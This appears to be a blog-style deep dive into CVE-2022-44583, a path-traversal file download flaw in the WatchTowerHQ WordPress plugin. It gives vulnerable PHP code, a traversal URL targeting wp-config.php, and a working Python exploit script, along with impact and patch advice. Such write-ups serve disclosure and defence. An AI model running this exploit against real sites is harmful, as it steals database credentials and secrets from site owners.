CVE-2022-44583 - Unauthorized Arbitrary File Download in WatchTowerHQ Plugin <= 3.6.15 for WordPress — Deep Dive Exploit Analysis

WordPress sites are a frequent target for hackers, mostly because of their huge ecosystem of third-party plugins. Unfortunately, one of these popular plugins, WatchTowerHQ, had a critical vulnerability up to version 3.6.15 that could let a remote attacker download any file from a target’s website — without even needing to log in!

This flaw has been cataloged as CVE-2022-44583, and in this detailed article, I’ll walk you through what happened, why it’s dangerous, the technical step-by-step, and even some demo code. We’ll cover how to scan your site for this bug, how attackers might exploit it, and what to do if you’re affected.

What is the WatchTowerHQ Plugin?

WatchTowerHQ is a popular WordPress plugin that helps you monitor website activity and receive security alerts. It’s meant to improve your site's safety but, ironically, for a while, it opened the exact opposite risk.

What Does “Arbitrary File Download” Mean?

An arbitrary file download is when a user (or hacker) can download files from the web server they were never meant to see. This could mean secrets like database configs (wp-config.php), logs, backup archives, or even files containing passwords and sensitive data.

With CVE-2022-44583, anyone — even guests without an account — could hand-craft a request to grab just about any file readable by the web server.

Where’s the Bug?

The root of this vulnerability is poor input validation. The plugin provided a functionality to download files, but didn’t properly check who was making the request or what file they were requesting.

Typical vulnerable code looked something like this (simplified for clarity)

if (isset($_GET['file'])) {
    $file = $_GET['file'];
    $filepath = WP_CONTENT_DIR . '/uploads/' . $file;
    if (file_exists($filepath)) {
        header('Content-Type: application/octet-stream');
        readfile($filepath);
    }
}

In real-life, the plugin’s handler didn’t verify the user or sanitize the file path, so something like ../../wp-config.php would escape out of the uploads directory and grab secret config files.

They build a URL that abuses the file download feature, for example

`

https://victimsite.com/wp-content/plugins/watchtowerhq/export.php?file=../../wp-config.php

`

The ../../ means “go up two directories.” This climbs out of the “uploads” folder and grabs the holy grail: WordPress configuration with DB passwords and salts!

Steal Sensitive Files

By changing the file parameter, the attacker can download any file they want (as long as the web server account can read it): logs, backups, plugin config, and more.

Here’s a sample Python exploit

import requests

target = 'https://victimsite.com/';
filename = '../../wp-config.php'  # File to steal
vuln_path = 'wp-content/plugins/watchtowerhq/export.php'

url = f"{target}{vuln_path}?file={filename}"

response = requests.get(url)
if response.ok:
    print('File Contents:')
    print(response.text)
else:
    print(f"Download failed: {response.status_code}")

Change victimsite.com to your target (or your own test setup, never attack sites you don’t own!).

Real-World Impact

- Stolen Database Credentials: Attackers can grab your wp-config.php, giving them DB passwords and salts.

Full Site Takeover: With DB access, someone could create new admin users or inject malware.

- Exposure of Sensitive Logs/Backups: Some plugins store unprotected backups in web-accessible locations. Now these are just a GET-away.
- Wider Server Compromise: If there are other important files (API keys, SSH keys), those could be at risk.

Original References & Further Reading

- CVE-2022-44583 NVD Entry
- WPScan Vulnerability Report
- WatchTowerHQ plugin in WP Plugins Directory
- Exploit Database Reference

Fix & Mitigation

WatchTowerHQ fixed this issue in version 3.6.16.  
If you use this plugin, update immediately!

Summary

CVE-2022-44583 was a serious flaw affecting all WatchTowerHQ plugin versions up to 3.6.15. It allowed anyone — without signing in — to download pretty much any file on a WordPress site, just by crafting a smart URL. Attackers could get database credentials, site secrets, and more, leading to full site compromise.

If your site runs WatchTowerHQ, update now and check for suspicious activity. If you’re responsible for others’ sites, spread the word and act fast.

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/21/2022 19:33:00 UTC